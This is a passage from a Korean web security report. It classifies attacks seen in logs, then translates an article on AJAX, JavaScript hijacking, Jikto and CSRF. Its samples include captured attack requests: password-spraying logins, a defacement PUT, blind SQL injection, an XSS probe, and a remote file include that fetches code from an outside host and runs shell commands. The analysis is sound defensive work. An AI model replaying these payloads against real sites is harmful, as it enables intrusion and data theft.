HEAD 요청 메서드 스캐닝 HEAD를 사용한 요청은 응답 속도를 높이기 위해 사용된다 (웹 서버는 응답 BODY를 되돌려줄 필요가 없기 때문이다) 응답은 Base64 인코디드 Credential 권한 부여 헤더를 포함한다. HEAD 요청 메서드 스캐닝은 401과 다른 HTTP 응답 상태 코드를 찾는데 그 목적이 있다 (대부분 200 이나 302) HEAD http://members.somesite.com/ HTTP/1.1 Host: members.somesite.com Referer: http://members.somesite.com User-Agent: Mozilla/5.0 ( Windows; U; Windows NT5.0; FireFox ) Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,*/* Accept-Language: en-us,en;q=0.5 Accept-Charset: utf-8,*;q=0.7 Authorization: Basic YnJlbnQ3NTp0YWNvcw== Connection: keep-alive GET 메서드 로그인 이 인증 메서드는 권한부여나 쿠키 헤더를 사용하는 대신 URL상의 사용자 Credential 을 통과한다. 로그인 데이터가 표준 로그 파일 포맷으로 쉽게 캡처될 수 있기 때문에 이런 유형의 권한부여는 안전하지 못한 것으로 간주된다. 리버스 무작위 스캔 이 공격은 다른 유저네임에 같은 타겟 패스워드 "psycho"를 반복적으로 대입한다. - 33 -

GET http://login.yahoo.com/config/login?.done=http://smallbusiness.yahoo.com/ services/index.php&.src=sbs&login= sala &passwd=psycho HTTP/1.0 GET http://217.12.8.237/config/login?.done=http://smallbusiness.yahoo.com/ services/index.php&.src=sbs&login=tki &passwd=psycho HTTP/1.0 GET http://202.43.196.46/config/login?.done=http://smallbusiness.yahoo.com/ services/index.php&.src=sbs&login=zozo_&passwd=psycho HTTP/1.0 GET http://w16.edit.tpe.yahoo.com/config/login?.done=http://smallbusiness. yahoo.com/services/index.php&.src=sbs&login=_plue&passwd=psycho HTTP/1.0 분산 스캐닝 공격자는 각종 야후 도메인에 분산 스캔을 수행한다. GET http://login.yahoo.com/config/login?.done=http://smallbusiness.yahoo.com/ services/index.php&.src=sbs&login= sala &passwd=psycho HTTP/1.0 GET http://217.12.8.237/config/login?.done=http://smallbusiness.yahoo.com/ services/index.php&.src=sbs&login=tki &passwd=psycho HTTP/1.0 GET http://202.43.196.46/config/login?.done=http://smallbusiness.yahoo.com/ services/index.php&.src=sbs&login=zozo_&passwd=psycho HTTP/1.0 GET http://w16.edit.tpe.yahoo.com/config/login?.done=http://smallbusiness. yahoo.com/services/index.php&.src=sbs&login=_plue&passwd=psycho HTTP/1.0-34 -

분산 리버스 무작위 스캔 불충분한 인증 불충분한 인증은 웹사이트가 민감한 컨텐츠나 기능을 적절한 인증 절차 없이 접속을 허용할 때 발생한다. 예: URL상에 유저네임을 입력해 Admin 권한에 접속. 클라이언트는 로그인을 하거나 권한 부여 쿠키를 제출할 필요가 없다. POST http://www.somesite.com/bbs/book_add.asp?username=admin HTTP/1.1 User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: www.somesite.com --생략-- - 35 -

Credential/Session Prediction Credential/Session Prediction은 하이재킹이나 웹사이트 사용자를 가장하는 기법을 말한다. 일반적인 공격 순서 1. 공격자는 웹 어플리케이션에 접속해 현재의 세션 아이디를 획득한다. 2. 공격자는 다음 세션 아이디를 계산 혹은 무작위 대입으로 추정한다. 3. 공격자는 COOKIE/HIDDEN FORM - FIELD/URL의 현재 값을 대입해 다음 사용 자 아이디를 추정한다. 비 암호화/Clear-Text 쿠키 데이터 아래는 어플리케이션이 클라이언트에 보낸 세션/쿠키 데이터 예제다. 데이터에 암호화나 해쉬가 적용되어 있지 않기 때문에, 공격자는 쉽게 데이터를 변경 해 다른 사용자 세션을 가로채는 시도를 할 수 있다. Set-Cookie: guestid=413; Set-Cookie: sessionid=1037236911; Set-Cookie: CurrentSessionCookie=212035755652; Set-Cookie: CFID=3937042;expires=Thu, Set-Cookie: Referer=/gate/gb/www.site.gov.mo/;Path=/ 불충분한 엔트로피 아래 쿠키값은 랜덤 추정 공격을 방지하기에 충분하지 못하다. 처음 9개 숫자는 같으며, 마지막 3개는 거의 순차적으로 값이 증가하고 있다. Set-Cookie: CurrentSessionCookie=212035755652; Set-Cookie: CurrentSessionCookie=212035755660; - 36 -

Set-Cookie: CurrentSessionCookie=212035755669; Set-Cookie: CurrentSessionCookie=212035755700; 불충분한 암호화 민감한 데이터는 종종 쿠키 헤더 데이터에서 통과되는데 강력한 암호화로 보호되어 있 지 않다. 위조 혹은 Base64 인코딩 같은 약한 보호책만 종종 사용된다. Base64 Encoding Base64 Encoded Set-Cookie: cpg132_data=ytozontzoji6ikleijtzojmyoii0yta4ytqwn jnizjm 2ZTc2NjAwMjE2NDRkMDE3NjdjZiI7czoyOiJhbSI7aToxO 3M6NDoibm FtZSI7czo0OiJBbm9uIjt9 Based64 Decoded Set-Cookie: cpg132_data=a:3:{s:2:"id";s:32:"4a08a4063bf36e7660 02164 4d01767cf";s:2:"am";i:1;s:4:"name";s:4:"Anon";} 불충분한 권한 부여 불충분한 권한부여는 웹사이트가 좀 더 많은 접속 제어 제한을 필요로 하는 민감한 컨텐트나 기능에 접속하는 것을 허용할 때 발생한다. - 앞의 예에서 든 쿠키는 유효한 세션아이디 해쉬와 유저네임을 포함하지만, 서투르게 제작된 어플리케이션은 종종 유효한 세션아이디와 유저네임 사이의 접속을 허용하지 않는다. 공격자가 쿠키값의 일부를 변경하고 유저네임을 바꾼다면 무슨 일이 일어날까? Set-Cookie: - 37 -

cpg132_data=a:3:{s:2:"id";s:32:"4a08a4063bf36e766002164 4d01767cf";s:2:"am";i:1;s:4:"name";s:5:"Admin";} 불충분한 권한 부여: 웹 변조 HTTP PUT method --6aa02c14-B-- PUT http://www.site.com/scorpion.txt HTTP/1.0 Accept-Language: pt-br, en-us;q=0.5 Translate: f Content-Length: 36 User-Agent: Microsoft Data Access Internet Publishing Provider DAV 1.1 Host: www.site.com Pragma: no -cache --6aa02c14-C-- 1923Turk CyberscorpioN ownz your box 불충분한 권한: 웹사이트 변조 SharePoint를 통한 파일 업로드 시도 - 38 -

POST http://www.site.com/_vti_bin/_vti_aut/author.dll HTTP/1.1 MIME-Version: 1.0 User-Agent: core-project/1.0 Host: www.site.com Content-Length: 194 Content-Type: application/x-vermeer-urlencoded Connection: close --400f1b0e-C-- method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&documen t=%5bdocument%5fname%3dcore%2ehtml%3bmeta%5finfo%3d%5b%5d%5d&p ut%5foption=overwrite&comment=&keep%5fchecked%5fout=false core-project 불충분한 세션 만료 불충분한 세션 만료는 공격자가 오래된 세션을 재사용하거나, 세션 아이디를 인증에 사용하는 것을 허용하는 웹사이트를 말한다. 만료 날짜/시간이 명기되어 있지 않다. Set-Cookie: phpbb2mysql_sid=9ff3b118fbbf63e088c99d09d810e311; path=/; domain=d M Y, G.i Expiration Date/Time is too long Set-Cookie: cpvr=3cc2d13f-1b27-4c11-a277- b3cb77bf33e3; domain=somesite.com expires=sun, 16- Jan-2107 12:27:36 GMT; path=/ 적절한 세션 만료는 웹 브라우저와 웹 어플리케이션의 세션을 만료, 무효, 삭제하는 것 을 의미한다. 서투르게 제작된 웹 어플리케이션의 경우, 웹 브라우저로부터 쿠키를 만료하거나 삭제 만 시도한다. 이 쿠키는 잠재적으로 웹 어플리케이션에 다시 보내질 수 있다. 기타 쿠키 이슈 - 39 -

대부분 웹 어플리케이션들은 HttpOnly와 안전한 쿠키 보호를 사용하지 않았다. HttpOnly를 이용하면 쿠키가 클라이언트-사이트 스크립팅에 의해 읽혀지는 것을 막 는데 도움이 된다. Set-Cookie: bbsessionhash=fd9145f449c2e67223b10f7623ea9231; path=/; HttpOnly 쿠키가 SSL-enabled 사이트에만 전송되도록 한다. Set-Cookie: phpbb2mysql_data=a%3a0%3a%7b%7d; expires=wed, 16-Jan-2008 19:59:57 GMT; path=/; secure 세션 고정 세션 고정은 사용자가 공격자가 선택한 세션 아이디를 사용하게 하는 공격이다. 세션 고정의 직접적인 증거는 찾지 못했지만, URL로 세션 아이디 정보를 허용하는 웹 어플리케이션의 경우를 발견했다. 이 경우 이메일상에 이 웹사이트들의 링크를 포함시 켜 세션 고정 공격을 쉽게 수행할 수 있다. POST http://somesite.com/joinsubmitaction.do jsessionid=df4b9604ed1467dfecd4bda7452e23d9 HTTP/1.1 POST http://www.somesite.com/gallery/./details.php? image_id=114&sessionid=6d0e2a51c515cb5b877bae03972a 0a78 HTTP/1.1 크로스-사이트 스크립팅 크로스-사이트 스크립팅(XSS)은 공격자가 제공한 실행 가능한 코드를 echo해는 것 을 웹사이트가 허용하게 하는 공격 테크닉이다. 모든 XSS 경보 메세지는 스패머들의 카겟으로, 각종 메세지 게시판에 HTML 게시물 을 보낸다. 아래 예는 악성 HTML 링크를 이용한 False Positive를 보여준다. - 40 -

GET http://search.revenuepilot.com/servlet/link?link=z0180h4siaaaaaaa AAGNgKyow1DNNsf_BAAOMEMpADi4iUJRalppXmlqQmZNfopecnwtXyebk6OfnGsSAChgF FgcntdieOXOWgbkiN4fBNKOkpKDYSl-_ODW5tChVD904_aziAv2M_NxUPSDDPjPF1tDI2 NACahjcZVCXAgCf6CRSsgAAAA..'%20onmouseover= HTTP/1.0 OS 커맨딩 OS 커맨딩은 어플리케이션 입력 조작을 통해 운영 시스템 커맨드를 실행해 웹사이트 를 익스플로잇 하는 공격 테크닉을 말한다. 예제: PHP 리모트 파일 인클루드를 이용한 id, ls, w 커맨드 실행: GET http://www.site.com/index.php?pagina=http://www.hackersite.org/ surveyor/lang/xpl/pro18.txt?&cmd=id;ls%20/;w HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: www.site.com User-Agent: libwww-perl/5.805 (Blind) SQL 인젝션 SQL 인젝션은 사용자 입력으로부터 SQL 구문을 구성하는 웹사이트를 익스플로잇 하는데 사용되는 공격 테크닉을 말한다. 아래는 실제 Blind SQL 공격의 예로, 데이터 베이스 이름을 한 번에 한 문자씩 추출하려 는 시로를 보여준다. 이 공격은 "--sp_password"를 사용해 SQL 쿼리가 백엔드 DB 서버에 의해 로그되는 것 을 막는 시도를 한다는데 유의한다. GET http://www.site.com/cart/loginexecute.asp?loginemail='%20 or%201=convert(int,(select%20top%201%20convert(varchar,name)% 20from%20sysobjects%20where%20xtype='u'%20order%20by%20name%2-41 -

0))--sp_password HTTP/1.1 Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/* User-Agent: Microsoft URL Control - 6.00.8169 Host: www.site.com Connection: Keep-Alive Cache-Control: no-cache SSI 인젝션 SSI 인젝션(Server-Side Include)은 서버-사이드 익스플로잇 테크닉으로, 이 테크닉 을 이용하면 웹 어플리케이션에 코드를 전송해 나중에 웹서버에 의해 로컬로 실행되게 할 수 있다. 스패머들은 SSI 커맨드가 포함된 POST 데이터를 전송한다. date=<!--#echo var=&name=veloplivw&email=hristosmertu63r@ gmail.com&message=hi this is a very informative site!: [URL=http://www.yasp.ch/gb.asp?user=allambien]ambien[/URL] --CUT-- 정보 유출 정보 유출은 웹사이트가 공격자가 시스템을 익스플로잇 하는데 도움이 되는 개발자 주석이나 에러 메시지 민감한 데이터를 노출하는 것을 말한다. - 42 -

기능 악용 기능 악용은 웹사이트 자체의 기능과 특징을 이용해 사기를 치거나 엑세스 컨트롤 메 커니즘을 우회하는 공격 테크닉을 말한다. 배너-애드/클릭 사기 광고료를 늘리기 위해 배너-광고에 접속을 시도하는 자동화 트래픽의 양이 상당히 많았다. 프록시 서버는 트래픽의 근원지를 감추는데 사용되었다. GET http://ad.doubleclick.net/clk;56074714;14719870 o?http://ad.doubleclick.net/clk;56074655;14719909; v?http://www.somesitesignup.com/signup/index.jsp?pc=ssu3 333 HTTP/1.0 구글 악용 구글을 프록시/리다이렉터로 사용한 배너 사기 - 43 -

GET http://tmsyn.wc.ask.com/r?t=an&s=le&uid=2d1d5c71ed1d5c71e&si d=3d1d5c71ed1d5c71e&o=10581&qid=a20f04ab708bf248de7ef794997f F36C&io=9&sv=0a30057a&ask=Broadband&uip=d1d5c71e&en=gg&eo=1& pt=broadband&ac=7&qs=0&pg=1&sgcl=cf6cnb-ysuszmt6- OF&sgch=5d0cLq_79y&u=http://www.google.com/url?sa=L&ai=BVHBs 413KRZTTM5ykpQKg9vjHDMvB5xS7pfjTAYiV4wSAph0QChgKIOmToAMoCjgB UIbu64r6 wfgyqayaedzmahyhggyafygazgbujigmag7kgayab- SBqoBBmRpXzEwMLIBCGJubXEuY29tyAEB2gEIYm5tcS5jb23IAuvwvwE&num =10&ggladgrp=248735307&gglcreat=358376127&q=http://ad.double click.net/clk%3b52309101%3b14013708%3bo%3fhttp://solutions.v zwshop.com/bba/&usg= mjx95gyhstv7y2bhtoizqoigaqu= HTTP/1.0 구글 해킹 스패머들은 구글을 사용자 포럼, 게시판 등을 검색하는데 사용했다. GET http://www.google.com/ie?as_q=certner+inurl:ultimate+ guestbook&num=100&hl=en HTTP/1.0 GET http://www.google.com/ie?as_q=inurl:phpbb+intext:index. php+related&num=100&hl=en HTTP/1.0 GET http://www.google.com/ie?as_q=inurl:viewtopic.php+ site:vg&num=100&hl=en HTTP/1.0 결론 웹 공격이 만연하고 있다. 공격자들은 극단적으로 대담했다. 주된 이유는 공격자들이 수많은 오픈 프록시 서버 뒤에 숨을 수 있다는 익명성 때문으로 보인다. 일부 공격에서 False Positives 가 높았다. 식별/보호 규정들과 더불어 과중한 데이터 분류라는 과제가 아직 남아 있다. 공격을 분류하기 위해 더 나은 자동 방식이 필요하다. - 그렇더라도, 일부는 한가지 트랜잭션만으로는 식별하기 어렵다. - 44 -

예외적인 공격과 트렌드를 식별하기 위해 더 나은 협조 능력을 필요로 한다. 아직도 배워야 할 것들이 많다. [미 CSI 문서] AJAX와 하이재킹 - 웹2.0은 성장하고 있지만 우리는 아직 준비가 되지 않 았다 (출처: http://www.whitehatsec.com/home/assets/newsletters/news_alert0507.pdf) 미 CSI 편집자 Sarah Peters가 AJAX and Hijacks- Web 2.0 is growing up. And we re not ready" 라는 제목의 논설을 발표했다. Sarah는 논설을 통해 자바스크립트 하이재킹, AJAX, CSRF, XSS, 인트라넷 해킹 등의 웹 어플리케이션 보안의 주요 이슈를 다루고 있다. 이 문서 는 원래 유료 뉴스레터지만, Jeremiah Grossman의 간곡한 요청으로 CSI는 무료 공개를 결정 했다. AJAX와 하이재킹 : "웹 2.0은 성장하고 있지만, 우리는 아직 준비가 되지 않았다" 차세대 인터넷 웹 2.0은 우리가 그런 것을 원했다는 것조차 알지 못했던 많은 기능들을 제 공한다. 예를 들어 세계야생동물재단 소속의 팬더곰을 후원하고 싶다면, 팬더곰이 새끼를 낳는 광경을 리얼타임 스트리밍 비디오를 통해 볼 수 있다. 하지만, AJAX는 많은 치명적인 취약점 으로 시달리고 있으며, 자바스크립트는 악의적인 목적으로 사용될 수 있다. 웹 2.0은 웹 1.0의 단점을 계승한 것만이 아니다. 우리가 겪어 본 적이 없었던 새로운 취약 점도 갖고 있다. AJAX 어플리케이션에 더 많은 기능과 파워를 부여할수록 웹 2.0은 웹 1.0의 오래된 취약점을 이용해 더욱 정교하고 위험한 익스플로잇을 가능하게 해준다. 사용자의 보안 옵션만으로는 충분치 못하다. 웹 2.0 보안은 주로 웹 어플리케이션 개발자들 의 의무이며, 브라우저 개발자, 보안 전문가에게 부분적으로 의무가 있다. 그러나 전형적인 - 45 -

소프트웨어 개발자들과 달리, 웹 개발자들은 자신이 개발한 어플리케이션에 존재하는 취약점 관련한 지원을 보안 커뮤니티로부터 받지 못하고 있다. 법규 때문이다. 보안 연구원들이 소프트웨어 취약점을 발표하는 것은 법적으로 허용되어 있다. 월례 브라우 저 버그 블로그를 운영하거나, DoS 팜플렛을 집집마다 나누어 주거나 리모트 코드 실행 문서 를 작성해도 아무도 뭐라고 하지 못한다. 하지만 웹은 경우가 다르다. 웹 사이트 소유자로부터 취약점을 점검해 달라고 부탁받지 못한 웹 보안 연구원은 웹 사이트 취약점을 찾는 행위 자체 만으로 (취약점을 일반에 공개하지 않았다 해도) 감옥에 갈 수 있기 때문이다. 이것이 과연 바 람직한 현상일까? 웹 보안 연구원들의 손에 수갑을 채우는 법은 인터넷 전체의 보안을 낮추는 결과를 가져오는 것이 아닐까? 법규가 바뀌어야 하는 것일까?이 같은 의문은 아직 답을 얻지 못했다. 웹 사용자들은 그들의 운명을 웹사이트 소유자들에게 맡길 것인지, 아니면 차세대 인 터넷인 웹 2.0 사용을 자제할 것인지, 둘 중 하나를 선택해야만 한다. 인터넷이 일상생활이 되어 온라인 의존도가 늘어나기 때문에 선택은 더욱 어려워진다. AJAX에 대한 지나친 신뢰 기존의 웹 1.0 어플리케이션은 전적으로 클라이언트가 아닌 서버에 존재했다. 때문에 사용자 가 변경할 때마다 서버는 전체 페이지를 reload 해야 했다. AJAX 어플리케이션은 클라이언트 에 단독으로 존재하거나, 클라이언트와 서버에 양다리를 걸치고 있기 때문에, 더 빠른 속도와 사용자 편의를 위해 서버와 클라이언트는 정보를 교환한다. AJAX가 더욱 복잡한 작업을 수행 할 수 있게 되면서, 개발자들은 AJAX 어플리케이션이 더욱 훌륭한 기능은 물론, 더욱 민감한 데이터 처리도 포함, 이 작업을 수행하게 했다. SPI 다이너믹스의 연구원 빌리 호프만은 이렇 게 말한다: "웹 2.0 이전에는자바스크립트로는 나쁜 짓을 할 수 없었다. 왜냐하면 중요한 것들 은 대부분 서버에서 실행되고 저장되었기 때문이다. 그러나 지금은 상당수 어플리케이션이 클 라이언트에 존재한다. 더 많은 정보를 클라이언트에 줄수록 자바스크립트는 점점 더 위험해진 다." "익스플로잇을 작성하는 사람들은 자바스크립트 책도 구입한다" Fortify Software사 설립자 이자 CSO인 브라이언 체스는 말한다. "2년 전만 해도 자바스크립트로 내부 네트워크 포트 스 캔을 한다는 것은 상상조차 할 수 없었다. 웹 2.0에서는 웹 1.0에 존재하던 모든 취약점을 걱 정해야 하지만, 공격자들은 이 취약점들을 웹 2.0에서 더욱 정교하게 익스플로잇 하고 있다. 체스는 지난 3월 Fortify 직원들과 공동 작업으로 자바스크립트 하이재킹 이라 불리는 익스 플로잇을 설명한 문서를 릴리스했다. 자바스크립트 하이재킹은 작년 화이트햇 시큐리티사의 CTO인 보안 전문가 Jeremiah Frossman이 구글의 지메일 취약점을 발견하면서 비롯, Fortify 팀은 공격 기법과 대책, 대부분 사이트들이 자바스크립트 하이재킹에 얼마나 취약한지와, 널리 사용되는 AJAX 프레임워크는 이 취약점에 어떻게 대처하고 있는지를 설명했다. "우리는 이 새로운 등급의 취약점이 웹 2.0에 해당된다는 것을 알고 정말 흥분 했습니다" 체 스는 말한다. 이 공격은 자바스크립트를 중요한 데이터 전송 포맷으로 사용하는 웹 2.0 사이트 에만 해당된다. 웹 2.0 사이트에만 해당되는 다른 사례는 본 적이 없습니다. - 46 -

자바스크립트 하이재킹 자바스크립트 하이재킹은 크로스-사이트 요청 위조라는 오래된 해킹을 이용한다. 이 공격을 이용하면 자바스크립트 메시지에 포함된 중요한 데이터를 권한을 부여받지 않고도 읽는 것이 가능하다. 이 공격은 자바스크립트의 동일출처정책(Same Origin Policy)을 이용한 것이다. 동 일출처정책은 한 웹사이트로부터 컨텐츠를 적재할 때, 다른 웹사이트로부터 로딩되는 스크립트 는 속성을 가져오거나 설정할 수 없게 하는 정책을 말한다. 그러나 동일출처정책에는 다른 웹 사이트의 자바스크립트가 다른 웹사이트의 구문에 포함되고 실행되는 것을 허용하는 루프홀이 있다고 Fortify는 보고서를 통해 밝혔다. 체스는 다음과 같은 시나리오를 제시한다: 공격자는 사용자를 악성 웹 사이트로 유인한 다음, 신용 카드사 사이트로 크로스-도메인 요청을 보낸 다. 신용 카드사의 웹서버가 카드 사용자의 데이터 전송에 HTML 대신 자바스크립트를 사용 하는 경우, 이 정보는 자바스크립트 포맷으로 사용자에게 보내진다. 공격자는 데이터에 접속할 수 없지만, 스크립트가 실행되는 것을 볼 수 는 있다. 공격자는 데이터를 표시하는 자바스크립 트를 다음과 같이 볼 수 있다. 이 자바스크립트는 카드 사용자의 중요한 데이터일 수 있다. [{"fname" : "Sara", "lname" : "Peters", "acctno" : "10020050505", "SS" : "1234567890", "username" : "sarapeters", "pswd" : "im50gr8rnt1"}] 연구원들은 이 공격에 대해 1) 악성 요청 거부 2) 자바 스크립트 응답에 대한 직접적인 실 행 금지 라는 2가지 방안을 제안한다. 악성 요청인지 여부를 쉽게 식별할 수 있는 방법 중 하 나는, 모든 합법적인 요청에 추정하기 힘든 비밀 파라메터를 추가하는 것이다. 동일출처정책은 악성 스크립트가 다른 도메인의 세션 쿠키에 접속하는 것을 금지하기 때문에, 세션 쿠키 자체 로도 요청에 추가할 훌륭한 비밀 value를 설정할 수 있다. 악성 사이트의 자바스크립트 응답 실행하는 것을 막기 위한 방법으로, 합법적인 사이트는 응답을 받는 쪽에서 변경하기 전에는 실행되지 않은 포맷으로 전송하는 방법을 들 수 있다. 합법적인 클라이언트 어플리케이션은 이 응답을 볼 수 있기 때문에, 엑스트라 문자를 스크립트 상에서 삭제한 후 실행하면 된다. 반면 악성 클라이언트는 이 스크립트를 수정하지 못하기 때문에, 실행할 수 없다. 연구원들은 10가 지 널리 사용되는 AJAX 프레임워크를 조사한 결과, 이 방식을 자바스크립트 하이재킹을 막는 데 사용하는 버전이 없다는 것을 알게 되었다. 자바스크립트 공격을 막는 기능을 가진 유일한 프레임워크는 Direct Web Remoting, version 2.0으로, 아직 개발 중이다. Fortify는 이 문서를 릴리스한 후, 프레임워크의 다음 릴리스에 이 기법을 포함시켜 공격을 방지하겠다는 통보를 널리 사용되는 AJAX 프레임워크 개발자들로부터 받았다고 한다. 마이크로소프트는 아직 언급이 없다고 한다. "마이크로소프트는 픽스하기를 윈치 않는다." 체 스는 말했다. "마이크로소프트 아틀라스는 자바스크립트 하이재킹을 허용하지 않도록 설정 되 - 47 -

어 있지만, 아틀라스 관련 문서에는 만일 더 나은 성능을원한다면 설정을 변경할 것을 권장한 다 라고 표기되어 있다. 마이크로소프트가 권하는 대로 변경한다면 자바스크립트 공격에 취약 해진다." 성능과 보안 둘 중 어느 것을 선택할 것인가? 보안을 선택할 것 같지는 않다고 체스는 말한 다. Jikto 빌리 호프만은 동일출처정책을 우회하는 다른 방법을 발견. 이 방법을 이용해 Jikto라 불리 는 웹 취약점 스캐너를 제작했다. 호프만은 3월 26일 워싱턴에서 개최되었던 ShmooCon에서 Jikto를 시연했다. 자바스크립트로 제작된 Jikto는 웹사이트에 임베드하거나 크로스-사이트 스 크립팅 취약점을 통해 사이트에 심을 수 있다. 최종 사용자인 Joe가 사이트 A를 방문하면. Joe의 브라우저는 자동으로 Jikto를 실행할 가능성이 크다. 대부분 브라우저가 자동으로 자바 스크립트를 실행하도록 설정되어 있기 때문이다. Jikto는 그런 다음 Joe의 웹 브라우저가 사이 트 B의 취약점 스캔을 수행하도록 한다. 하지만 동일출처정책이 사이트 A의 자바스크립트가 사이트 B의 컨텐트에 접속하는 것을 금지하기 때문에 사이트 B를 직접 스캔할 수는 없다. 이 정책을 우회하기 위해 Jikto는 프록시 서버를 통해 브라우저 요청을 보내 사이트 B에 접 속한다. 프록시는 사이트 B의 데이터를 retrieve 한다. 이 때 Jikto와 데이터는 동일한 출처에 존재하기 때문에, Jikto는 취약점 스캔을 수행해 발견한 것들을 사이트 A에 Jikto를 인스톨한 공격자에게 보고할 수 있다. 사이트에서 직접 수행하는 것이 아니고, 프록시상에서 데이터 스 캔을 수행하는 것이기 때문에 사이트 B의 소유자는 스캔 당했다는 사실을 알지 못한다. 설사 프록시에 요청을 보낸 시스템을 추적한다 해도, 스캔 보고서를 받은 공격자가 아닌, Joe가 추 적된다. 만일 Joe가 취약점 스캔 허가를 받은 윤리적인 해커라면 어떨까? 이것이 빌리 호프만 이 Jikto를 제작한 이유다. 취약점 스캔 결과는 GUI로 볼 수 있다. 하지만, 약간의 수정을 하 면 공격자는 Jikto를 몰래 스캔하는 용도로 사용할 수 있다. 이것이 SPI 다이너믹스가 ShmooCon 프레젠테이션에서 Jikto 소스 코드를 공개하지 않은 이유다. 하지만 Jikto 소스코드 는 어쨌거나 유출되었다. 호프만은 4월 2일 그의 블로그를 통해, 프레젠테이션을 위해 Jikto 소스 코드를 인터넷상에 올려 놓았다고 말했다. 코드 위치를 보호하기 위해 호프만은 VPN으 로 스파이 다이너믹스 네트워크에 접속해 사무실에 있는 호프만의 데스크탑에 접속해 시연을 했다고 한다. 호프만은 블로그에 다음과 같이 전하고 있다: "이것은 시연을 보았던 누군가가 트래픽을 스니핑해 Jikto를 올려놓은 곳을 찾아냈다는 것을 의미한다. 만일 누군가가 아주 가까이서 시연을 봤다면 Jikto 소스코드가 저장된 URL을 볼 수 있었을 것이다. 나는 프록시를 통해 사무실의 모든 머신에 Jikto에 대한 모든 요청을 조사했다. 최초의 요청은 Jikto 코드를 빼내기 위한 것이었다. 누군가가 URL을 알아낸 것 같다고 생각했 는데, 사실이었다. LogicX라는 닉을 사용하는 누군가가 이 방법으로 코드를 가져갔고, 이 코드 를 ShmooCon이 끝난 하루 뒤 Digg에 올렸다. - 48 -

호프만은 LogicX 에게 게시물 삭제를 요청했고, LogicX는 그렇게 했다. 하지만, 너무 늦었 다. 호프만은 소스가 유출된 것에 대해 크게 걱정하지는 않는다. "Jikto는 만능이 아니다. 그리 고 그런 일은 언제든 일어날 수 있다." 호프만은 악의적인 해커들이 소스 코드를 그대로 사용 하지는 않을 거라고 말했다. "Jikto는 내가 제작했지만, 인터페이스가 커서 수정해야 한다." 하 지만 일부 보안 연구원들은 Jikto를 제작한 근원적인 이유에 의문을 표시했다. 크로스-사이트 요청 위조 크로스-사이트 스크립팅(XSS)이 떠오는 별이 되고 있다. 최근 릴리스된 2개의 보고서에 의 하면, 웹 2.0의 출현으로 인해 크로스-사이트 요청 위조(CSRF)가 주목받을 것이라 한다. 4월 19일 화이트햇 시큐리티는 "Security Web Application Security Risk Report"를, OWASP는 최근에 "가장 치명적인 웹 어플리케이션 보안 취약점 보고서"를 릴리스했다. OWASP의 Top 10은 2006년 10월 MITRE가 릴리스한 취약점 트렌드 보고서상의 통계에 기 반한다. 화이트햇 시큐리티는 화이트햇 시큐리티의 취약점 진단 제품을 통해 모니터링한 웹사 이트로부터 수집한 자료에 기반한다. 두 보고서 모두 크로스-사이트 스크립팅이 가장 널리 사 용되는 웹 취약점이라고 지적했다. OWASP는 CSRF를 5위로 선정했다. 다음은 OWASP 보고 서 본문 일부다: "크로스 사이트 요청 위조(CSRF)는 OWASP Top 10에 새롭게 포함된 취약점이다. MITRE 는 36위로 지정하고 있지만, 오늘날 어플리케이션(특히 높은 가치의 어플리케이션과 민감한 데이터를 처리하는 어플리케이션)에 보안이 필요하다는 점을 고려할 때 아주 중요하다고 생각 된다. CSRF는 화이트햇 시큐리티사의 Top 10 에 포함되지 못했지만, 기업이 유의해야 할 취약점 으로 별도 분류하고 있다. 다음은 화이트햇 시큐리티 보고서의 본문 일부다: "CSRF는 인증 받은 사용자가 보내는 유효한 요청으로 해킹이 아니다. 대부분 전문가들은 일 반 웹사이트가 이 공격에 보호되지 못한다는 점에 동의한다. 또한 최근 스캐닝 기능이 극히 제 한적으로 CSRF를 탐지한다는데 동의한다." 보안 연구원들은 Jikto를 사용할 수 있겠지만 반드시 Jikto를 사용해야 할 이유는 없다. Jikto 의 좋은 점은 소프트웨어를 인스톨하지 않고 브라우저상에서 실행할 수 있다는 점이다. Jikto 는 다른 웹 취약점 스캐너들이 스캔하지 못했던 것들을 스캔해 주는 것도 아니다. 이름도 Nmap 메일링 리스트 Insecure.org 독자들이 선정한 베스트 웹 취약점 스캐너인 Wolto와 Nikto와 비슷하다.호프만은 SPI 다이너믹스사가 Jikto를 취약점스캐너로 릴리스할 생각은 전혀 없었고, 단지 유용한 proof-of-concept로 시연할 목적이었다고 말한다. "우리는 단지 자바스크립트를 이용하면 우리가 생각했던 것보다 훨씬 이상의 것들을 할 수 있다는 것을 보여주고 싶었을 뿐이다. Jikto를 통해 XSS 취약점의 심각성을 더욱 심각하게 고 려해야 한다는 것을 보여주었다." 호프만은 현재 XSS 취약점이 헤아릴 수 없을 정도로 많지만, 개발자들은 코드상의 문제점 픽스 순위를 정할 때 XSS 취약점 픽스를 낮은 순위로 정한다고 말했다. - 49 -

인트라넷 해킹 이 익스플로잇들은 자바스크립트가 브라우저상에서 얼마나 나쁜 용도로 사용될 수 있는지를 보여준다. 6월 11일에서 13일까지 열릴 예정인 netsec 컨퍼런스에서 화이트햇 시큐리티의 Grossman은 브라우저를 이용해 기업 인트라넷에 침입하는 방법을 시연할 예정이다. Grossman은 IP 주소 가로채기, 서핑 히스토리 가로채기 등을 비롯, 이 방법들을 조합한 시나 리오를 통해 자바스크립트로 할 수 있는 모든 것을 보여줄 것이라고 말했다. 일단 침입에 성공한 공격자는 침입한 브라우저 사용자의 모든 권한에 접속할 수 있다. 엑세 스 로그 파일로는 바이러스 작업을 확인할 수 없다. 로그는 데이터베이스 파일을 수정하고 보 내는 권한을 가진 사용자만 보여줄 뿐이다. 거기서 끝나는 것이 아니다. 사용자에게 관리자 권 한이 있는 경우, 공격자는 포트 스캔, 라우터 재설정, 방화벽 재설정, 웹서버 핑거 프린트, 급 여 시스템 등에 접속할 수 있다. 자바스크립트을 이용하면 인트라넷 해킹을 비롯, 사람들이 생 각하는 것 이상의 심각한 악성 해킹이 가능하다고 Grossman은 말한다. 어떻게 해야 하는가? 제일 먼저 해야 할 것은 자바스크립트를 disable 하는 것이다. Grossman은 2개의 브라우저 를 사용, 하나는 중요한 작업에, 다른 하나는 중요하지 않은 작업에 사용한다고 말했다. 미국 컴퓨터 사기 및 오용법과 영국의 컴퓨터 오용 관련법은 타인의 컴퓨터 시스템에 접속 하는 시도 및 기타 기능을 수행하기 위해 접속하는 